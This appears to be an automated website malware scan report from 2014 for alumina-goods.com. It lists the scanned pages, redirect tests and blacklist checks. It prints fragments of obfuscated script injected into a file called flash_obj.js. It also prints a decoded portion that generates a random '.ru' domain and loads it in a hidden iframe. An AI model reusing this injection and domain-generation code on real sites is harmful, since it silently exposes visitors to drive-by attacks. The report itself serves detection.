Scanned pages/files
Request | Server response | Status |
http://alumina-goods.com/ | 200 OK Content-Length: 31204 Content-Type: text/html | clean |
http://alumina-goods.com/flash_obj.js | 200 OK Content-Length: 5961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function flash_obj(obj,width,height) { htmlstr="<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\""+width+"\" height=\""+height+"\">"; htmlstr+="<param name=\"movie\" value=\""+obj+"\">"; htmlstr+="<param name=\"quality\" value=\"high\">"; htmlstr+="<param name=\"wmode\" value=\"transparent\">"; htmlstr+=" r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s);
Decoded script:
function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */
Antivirus reports:
http://alumina-goods.com/index.asp | 200 OK Content-Length: 31204 Content-Type: text/html | clean |
http://alumina-goods.com/company.asp | 200 OK Content-Length: 27428 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp | 200 OK Content-Length: 30125 Content-Type: text/html | clean |
http://alumina-goods.com/quality.asp | 200 OK Content-Length: 26426 Content-Type: text/html | clean |
http://alumina-goods.com/dload.asp | 200 OK Content-Length: 27503 Content-Type: text/html | clean |
http://alumina-goods.com/liuyan.asp?action=Add_New | 200 OK Content-Length: 36175 Content-Type: text/html | clean |
http://alumina-goods.com/contact.asp | 200 OK Content-Length: 26760 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=2 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=1 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=3 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=5 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=6 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
http://alumina-goods.com/product.asp?Pone=1&plt=11 | 200 OK Content-Length: 26086 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alumina-goods.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 21 Jun 2014 23:39:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31204
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSCSBCADT=PFKBNLADDFGJMNJMJFNCLJBL; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...31204 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alumina-goods.com
Referer: http://www.google.com/search?q=alumina-goods.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alumina-goods.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alumina-goods.com/
Result: alumina-goods.com is not infected or malware details are not published yet.